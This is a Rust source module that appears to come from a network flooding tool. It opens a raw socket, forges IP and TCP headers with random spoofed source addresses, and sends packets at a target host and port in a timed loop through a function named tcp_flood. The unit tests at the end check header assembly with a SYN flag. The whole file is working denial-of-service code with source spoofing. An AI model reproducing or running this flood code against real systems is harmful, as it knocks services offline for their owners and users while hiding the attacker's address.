use crate::ip::IpHeader;
use crate::progress_bar::ProgressBar;
use crate::tcp::TcpHeader;
use rand::Rng;
use socket2::{Domain, Protocol, SockAddr, Socket, Type};
use std::io;
use std::net::{Ipv4Addr, SocketAddrV4};
use std::time::{Duration, Instant};
pub fn init_socket(
dest_ip: &str,
dest_port: u16,
packet_len: usize,
_iface: Option<&str>,
) -> io::Result<Socket> {
let socket = Socket::new(Domain::IPV4, Type::RAW, Some(Protocol::from(6)))?;
let dest_addr = SocketAddrV4::new(dest_ip.parse().unwrap(), dest_port);
socket.set_header_included(true)?;
socket.connect(&SockAddr::from(dest_addr))?;
socket.set_tos(0)?;
socket.set_ttl(60)?;
socket.set_send_buffer_size(packet_len)?;
#[cfg(any(
target_os = "ios",
target_os = "macos",
target_os = "tvos",
target_os = "watchos"
))]
if let Some(iface_name) = _iface {
let iface_index = socket.device_index_v4(&iface_name)?;
socket.bind_device_by_index_v4(Some(&iface_index))?;
}
Ok(socket)
}
pub fn generate_random_ip() -> u32 {
let min_ip: u32 = Ipv4Addr::new(0, 0, 0, 0).into();
let max_ip: u32 = Ipv4Addr::new(255, 255, 255, 255).into();
let random_ip: u32 = rand::thread_rng().gen_range(min_ip..=max_ip);
random_ip
}
pub fn create_combined_header(ip_header: &IpHeader, tcp_header: &TcpHeader) -> Vec<u8> {
let ip_bytes = ip_header.as_bytes();
let tcp_bytes = tcp_header.as_bytes();
ip_bytes
.iter()
.cloned()
.chain(tcp_bytes.iter().cloned())
.collect()
}
pub fn tcp_flood(
packet_len: usize,
dest_ip: &str,
dest_port: u16,
flag: &str,
duration: usize,
number: usize,
iface: &str,
) -> Result<(), Box<dyn std::error::Error>> {
let mut progress_bar = ProgressBar::new(number, duration * 60);
let start_time = Instant::now();
let duration_limit = Duration::from_secs((duration * 60) as u64);
let socket = init_socket(dest_ip, dest_port, packet_len, Some(iface))?;
for i in 0..number {
if start_time.elapsed() > duration_limit {
break;
}
let source_ip = generate_random_ip();
let ip_header = IpHeader::new(source_ip, dest_ip);
let tcp_header = TcpHeader::new(source_ip, dest_ip, dest_port, flag, packet_len);
let combined_header_slice = create_combined_header(&ip_header, &tcp_header);
let mut buffer = vec![0u8; packet_len];
buffer[..combined_header_slice.len()].copy_from_slice(&combined_header_slice);
socket.send_with_flags(&buffer, 2)?;
progress_bar.inc(i + 1);
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_fill_ip_header() {
let source_ip = generate_random_ip();
let ip_header = IpHeader::new(source_ip, "192.168.1.10");
assert_eq!(ip_header.version_ihl, 0x45);
assert_eq!(ip_header.protocol, 6);
}
#[test]
fn test_create_combined_header() {
let source_ip = generate_random_ip();
let ip_header = IpHeader::new(source_ip, "192.168.1.10");
let tcp_header = TcpHeader::new(source_ip, "192.168.0.1", 80, "syn", 1500);
let combined_header = create_combined_header(&ip_header, &tcp_header);
assert_eq!(
combined_header.len(),
std::mem::size_of::<IpHeader>() + std::mem::size_of::<TcpHeader>()
);
assert_eq!(
&combined_header[0..std::mem::size_of::<IpHeader>()],
ip_header.as_bytes()
);
assert_eq!(
combined_header[std::mem::size_of::<IpHeader>()..],
tcp_header.as_bytes()
);
}
}